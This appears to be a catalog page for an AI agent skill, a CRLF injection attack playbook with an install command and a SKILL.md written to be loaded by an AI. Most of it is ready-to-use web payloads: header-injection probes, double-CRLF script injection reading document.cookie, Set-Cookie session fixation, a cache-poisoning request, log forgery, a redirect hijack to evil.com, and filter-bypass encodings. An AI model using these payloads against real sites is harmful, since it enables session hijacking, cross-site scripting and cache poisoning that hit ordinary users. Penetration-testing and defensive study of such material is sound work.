crlf-injection
yaklang/hack-skills
CRLF injection attack playbook for HTTP response splitting, header injection, and cache poisoning.
What is crlf-injection?
CRLF injection (HTTP response splitting) occurs when user input reaches HTTP response headers, redirects, cookies, or logs without sanitization. Use this skill to detect and exploit carriage-return/line-feed character injection that can split headers, inject new headers, poison caches, or escalate to XSS and session fixation attacks.
- Detect CRLF injection via basic probes (%0D%0A in headers and parameters)
- Exploit double CRLF sequences to inject response body content and XSS payloads
- Perform session fixation attacks by injecting Set-Cookie headers
- Execute cache poisoning by injecting headers into cached responses
- Bypass CRLF filters using double URL encoding, Unicode substitutes, and partial LF injection
- Chain CRLF injection into XSS, redirect hijacking, and log forgery attacks
How to install crlf-injection
npx skills add https://github.com/yaklang/hack-skills --skill crlf-injectionHow to use crlf-injection
- 1.Identify user input that reaches HTTP response headers, Location redirects, Set-Cookie values, or log files
- 2.Test basic CRLF injection by appending %0D%0A followed by a new header name (e.g., %0D%0AX-Injected:true)
- 3.For body injection, use double CRLF (%0D%0A%0D%0A) followed by HTML/JavaScript payload
- 4.Attempt filter bypasses: double URL encoding (%250D%250A), Unicode substitutes (%E5%98%8A%E5%98%8D), or LF-only (%0A)
- 5.Chain successful CRLF injection into session fixation (Set-Cookie injection) or XSS (body injection)
- 6.Verify if responses are cached to assess cache poisoning impact
Use cases
- Testing redirect parameters for CRLF injection to hijack Location headers
- Injecting Set-Cookie headers via CRLF to perform session fixation
- Exploiting double CRLF to inject malicious JavaScript into HTTP response bodies
- Poisoning CDN/proxy caches by injecting headers that affect all downstream users
- Forging log entries by injecting CRLF in User-Agent or Referer fields
- Security researchers testing HTTP response handling
- Penetration testers auditing redirect and header injection vulnerabilities
- Bug bounty hunters looking for cache poisoning and session fixation chains
- Application security teams validating input sanitization in header-setting code
crlf-injection FAQ
Single CRLF (%0D%0A) injects a new HTTP header. Double CRLF (%0D%0A%0D%0A) ends the header section and begins the response body, allowing injection of HTML, JavaScript, or other content.
Try double URL encoding (%250D%250A), Unicode equivalents (%E5%98%8A%E5%98%8D for CRLF), LF-only (%0A), or inject in parameter names instead of values.
Yes. Using double CRLF to inject a response body allows you to inject arbitrary HTML and JavaScript, which executes in the victim's browser.
If a CRLF-injected response is cached by a CDN or proxy, the injected headers or body are served to all subsequent users, amplifying the attack impact.
By injecting a Set-Cookie header via CRLF, an attacker can force a victim to use an attacker-controlled session ID, allowing the attacker to hijack the session after login.
Full instructions (SKILL.md)
Source of truth, from yaklang/hack-skills.
name: crlf-injection description: >- CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.
SKILL: CRLF Injection — Expert Attack Playbook
AI LOAD INSTRUCTION: CRLF injection (HTTP response splitting) techniques. Covers header injection, response body injection via double CRLF, XSS escalation, cache poisoning, and encoding bypass. Often overlooked by scanners but chains into XSS, session fixation, and cache attacks.
0. RELATED ROUTING
- ghost-bits-cast-attack when the target is a Java service and
%0D%0A/\r\nencodings are WAF-blocked — substituting瘍(U+760D, low byte\r) and瘊(U+760A, low byte\n) injects a real CRLF through Angus Mail / Jakarta Mail SMTP, Apache HttpClient headers, JDK HttpServer responses, and ActiveJ HTTP (re-enables Jira CVE-2025-57733 and JDK CVE-2026-21933 classes)
1. CORE CONCEPT
CRLF = \r\n (Carriage Return + Line Feed, %0D%0A). HTTP headers are separated by CRLF. If user input is reflected in a response header without sanitization, injecting CRLF characters creates new headers or even a response body.
Normal: Location: /page?url=USER_INPUT
Attack: Location: /page?url=%0D%0ASet-Cookie:admin=true
Result: Two headers — Location + injected Set-Cookie
2. DETECTION
Basic Probe
%0D%0ANew-Header:injected
# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true
# Check response headers for "X-Injected: true"
Double CRLF — Body Injection
Two consecutive CRLF sequences end headers and start body:
%0D%0A%0D%0A<script>alert(1)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(1)</script>
3. EXPLOITATION SCENARIOS
Session Fixation via Set-Cookie
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
XSS via Response Body
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
Cache Poisoning
If the response is cached by a CDN or proxy, injected headers/body are served to all users:
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
Log Injection
CRLF in log-visible fields (User-Agent, Referer) can forge log entries:
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
4. FILTER BYPASS
| Filter | Bypass |
|---|---|
Blocks %0D%0A | Try %0D alone, %0A alone, or %E5%98%8A%E5%98%8D (Unicode) |
| URL decodes once | Double-encode: %250D%250A |
Strips \r\n literally | Use URL-encoded form |
| Blocks in value only | Inject in parameter name |
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D → decoded as CRLF in some parsers
# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF
# Partial injection (LF only):
%0A → some servers accept LF without CR
5. REAL-WORLD EXPLOITATION CHAINS
CRLF + Session Fixation
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id
# Victim uses attacker's session → attacker hijacks after login
CRLF → XSS via Double CRLF Body Injection
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(document.cookie)</script>
CRLF in 302 Location → Redirect Hijack
# Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A
# Some servers use the LAST Location header → redirect to evil.com
6. COMMON VULNERABLE PATTERNS
// PHP — header() with user input (PHP < 5.1.2 vulnerable):
header("Location: " . $_GET['url']);
// Python — redirect with unsanitized input:
return redirect(request.args.get('next'))
// Node.js — setHeader with user input:
res.setHeader('X-Custom', userInput);
// Java — response.setHeader with user input:
response.setHeader("Location", request.getParameter("url"));
7. TESTING CHECKLIST
□ Inject %0D%0A in redirect URL parameters
□ Inject %0D%0A in Set-Cookie name/value paths
□ Try double CRLF for body injection → XSS
□ Test encoding bypasses: double-encode, Unicode (%E5%98%8D%E5%98%8A), LF-only (%0A)
□ Check if response is cacheable → cache poisoning
□ Test in User-Agent / Referer for log injection
□ Test CRLF + Set-Cookie for session fixation
□ Verify if Location header can be injected in 302 responses
Related skills
More from yaklang/hack-skills and the wider catalog.

csp-bypass-advanced
Advanced Content Security Policy bypass techniques for XSS, nonce abuse, and trusted endpoint exploitation.

csrf-cross-site-request-forgery
Expert CSRF attack playbook covering modern bypasses, SameSite gaps, JSON CSRF, and token flaws.

csv-formula-injection
Detect and test formula injection in CSV exports and spreadsheet imports.

dangling-markup-injection
Exfiltrate sensitive data via unclosed HTML tags when JavaScript execution is blocked by CSP or sanitizers.

defi-attack-patterns
Expert DeFi attack pattern playbook for flash loans, oracle manipulation, MEV, and governance exploits.

dependency-confusion
Identify and test supply-chain dependency confusion vulnerabilities across npm, pip, Ruby, Maven, Composer, and Docker.